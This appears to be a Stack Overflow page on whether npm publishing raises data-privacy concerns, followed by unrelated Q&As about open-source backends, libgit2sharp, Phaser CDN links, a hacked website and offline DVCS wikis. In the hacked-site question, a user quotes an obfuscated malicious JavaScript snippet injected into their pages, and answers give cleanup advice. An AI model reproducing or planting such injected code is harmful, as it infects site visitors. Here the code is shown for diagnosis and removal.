We are creating a Web component that will be available via a self-hosted CDN in Europe.
The idea is to make it as easy as possible for developers to integrate the Web component in a Website.
One of those ways is to publish it on npm.
The question now is:
Since the project underlies very strict Data privacy requirements:
Could one make the case that npm is unsafe from the perspective of data privacy?
In other words: Does the act of publishing an npm package cause a data privacy issue for the consuming developer or more specifically Enduser using the Webcomponent in the browser?
Of course, this question excludes issues with the Web Component itself, since they can cause an issue on their own. I am only interested in hosting a package on npm.
Upon some investigating: I am from Germany and data privacy and data protection seem to translate to the same word (Datenschutz). So in this question both is meant.
I would not use StackOverflow to seek advice on complying with data privacy laws or regulations. I am not a lawyer and I doubt very many people on here are. That said, there are some generalities that can be made that may or may not apply to your specific case. Again, I am not a lawyer, and this is not legal advice.
I'm not sure if you are talking about the public npm registry or a private one.
In terms of data privacy, publishing your code to the public npm registry isn't much different from publishing it to GitHub or to a blog. If the code, examples, documentation, and various configuration files do not contain sensitive data, publishing them to the public npm registry won't create issues. If one or more files that you publish do contain sensitive data, then publishing them to the npm registry will pose similar risks to posting them to GitHub or a blog.
If you are using a private npm registry, things might be a lot more complicated and I would not trust an answer on StackOverflow. Get your data security folks talking to your developers and the people who are doing the registry hosting.
Related
Currently I'm creating an open source project and I want people to participate in creating the backend code, a simple API. May sound newbie, but ive been told that I should never make public my backend code, for security reasons. Then how can people collaborate making the API if they can't make it public. They should secretly send me the code or there's no security issues by doing so.
Thank you very much.
No, it is not a security issue itself. There are lots of good well-secure open source backends and libs to write backends are published in open public repositories.
And the opposite, if you deploy non-secure backend (i.e. with bugs, old exploited libs, etc.), even the privacy of your source code will not help you. Public source code will make it faster to break into, but it does not make it less secure comparing with the private code.
I have a usecase where I need to be able to inspect Git repositories as part of a web service and the average repo size will be very large - 1GB+ due to being used for video game projects. I need to do simple actions such as listing the revision history, etc.
Right now I'm implementing it via API calls to the remote Git host services (Github, Bitbucket, etc). This works okay, however there are some great Git projects like GitVersion that only work with real Git repos, that use libGit2sharp, and I cannot easily write a work around for.
I feel like this'll be a longshot, but I was wondering if anyone has discussed or begun work upon an implementation of libGit2sharp that works with the major Git hosts via their API's. Obviously not all actions available in libGit2 will work with an API interface, but at least most read-only actions should be.
If this is an entirely new feature request - I'd like to get the opinion of someone with knowledge of the libGit2sharp codebase about how difficult such a feature request would be to implement.
Git only specifies the network protocol for fetching, pushing and creating an archive. Nothing else can be done via the Git protocol (and providers will likely disable the archive so they can leverage their existing caching solutions).
If this is an entirely new feature request - I'd like to get the opinion of someone with knowledge of the libGit2sharp codebase about how difficult such a feature request would be to implement.
This feature would be out of scope and impossible as Git does not provide a way to perform these tasks.
Once you're trying not to do Git, then you're out of the Git world into each provider's API. Trying to replicate Git operations and git commands on top of each provider's API is a whole project unto itself, and one which is likely to get you to hit these provider's API limits, as in-depth analysis of the repositories is not generally why they provide these services.
Not to mention that looking up each necessary object over HTTP would be extremely slow and you'd likely not gain anything over grabbing a Gigabyte or two from the network.
But if all you need is a few questions that can be easily answered from the APIs themselves (say, latest commit and its relationship to different branches), and you do need the logic in GitVersion, then you're probably better off making its history analysis pluggable so you can put in the data from your API lookups.
I'm not familiar with how GitVersion makes its decisions, but if it doesn't just want references and their relationships to each other and the tags, but rather it wants to look at the repositories themselves, and you do need it rather than just replicate some of its logic, I would recommend to download the repositories and perform all the analysis there. It'll be a much more efficient use of time to rent a bit of disk space from some provider than try to fit each individual provider's API into some idealised version of a git command where you then still need to figure out the edge cases of both the command and its API you're using.
As a jQuery user, I link the remote library from Google using
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
which is very clever because it's already loaded in the brower cache if the reader visited another site that did the same.
As I discover Phaser, I was hoping to see people on the web doing the same with
<script src="https://raw.githubusercontent.com/photonstorm/phaser/master/build/phaser.min.js"></script>
or any library hoster, but apparently no one does.
Is there a reason why Phaser users don't do that?
I would strongly advise against linking to the master release as it will absolutely break your games over time. Most of the 2.0.x updates have been non-API changing, but 2.1 and above will be altering some core aspects of Phaser. You should only ever link to specific versions.
For a similar service to the Google hosted APIs (of which they only host very specific libraries that they've selected) we use CDN.js, which offers the same thing. You can find details in the Phaser README or just go to http://cdnjs.com/ and search for Phaser.
There is as such no issue if you link to a specific version. But you don't want the latest build, as this can potentially break your site by making changes.
I don't know Github's policies on referencing their site like this.
yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
deactivate plugins that are not high ranked or from reputed source.
Use secure protocols.check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :
Change your passwords.
Restore the most recent non compromised backup.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 8 years ago.
Improve this question
My team and I have found that documenting our project (a development platform w/ API) with a wiki is both useful to us and useful to the users. Due to some organizational issues, we're forced to do multi-site development without network connectivity. We've switched to a DVCS (Mercurial) and had great success with this. The wiki documentation proves to be a problem as the central site is setup with MediaWiki. The offsite people have no way to access or edit the wiki.
Is there any sort of wiki-style package which doesn't not require a server/database and will be useable in a DVCS environment?
Update: Should be open-source and cross-platform
I can recommend TiddlyWiki. It does not need any web servers, only a browser, stores the entire Wiki documentation in a single HTML page. This can easily be shared through Mercurial.
Edit: Check this page, it discusses how to use TiddlyWiki with DVCS. It involves using an extension dubbed SynchroTiddly.
DokuWiki stores all data in plain text files. You could install local web servers for every developer and use your VC system to sync between developers.
ikiwiki: http://ikiwiki.info/ stores the info directly in the VCS (it supports mercurial as backend).
http://zim-wiki.org/
It's a desktop wiki (WYSIWYG editing, though not very sophisticated formatting) which stores everything in plain-text files. That means you can hold the files in version control, and have a friendly editing experience.
It even has builtin Bazaar support UPDATE: also Git, Mercurial, and Fossil.
[I know, late to the party - writing for benefit of others reading this question...]
Perhaps you should look at auto-generation of documentation from source. This way, the documentation will automatically be version controlled.
A lot of generators support adding additional documentation via plain-text files which can be added to the repository.
Look into Fossil it is a DVCS that contains a built in wiki and bug tracking system. This may be just what your looking for. Read the site, there is a built in webserver. You can use a CGI script to open up the connection to people (the fossil website is the fossil DVCS). After using it you may decide to move your code over to it as well. It is open source, and does have cross platform builds.
Ended up writing my own system using python,cherrpy, and mercurial. Perhaps one day it will end up open-source. Thanks for all the suggestions.
http://hatta-wiki.org/ is a wiki running on a Mercurial repository.
It's interesting to note how it handles conflicts: simultaneous edits are silently merged on commit, even if conflicting and committed with the conflict markers! That's OK because:
it's text, not software
you see the result of your edit immediately after commiting
it treats conflict markers as valid wiki syntax (resulting in diff -u like highlighting of the conflict)!
This arrangement motivates you to edit again to resolve the conflict immediately - but doesn't force you to.
Github's gollum is open-source, git based, eats many popular syntaxes.
But the most important selling point of course is that it's built into github.
Bitbucket similarly has a mercurial based wiki. Not sure if the code is open source though (i.e. you can edit the text offline, but not sure that you can see it rendered).
MoinMoin supports storing your pages in a Mercurial repository: http://moinmo.in/Storage2009/HelpOnStorageConfiguration#Mercurial_Backend_.28hg.29
This is quite interesting because MoinMoin has been around for a while, is rather well supported, and a rich set of features (but that's just my opinion; don't take my word for it and see for yourself ;-)).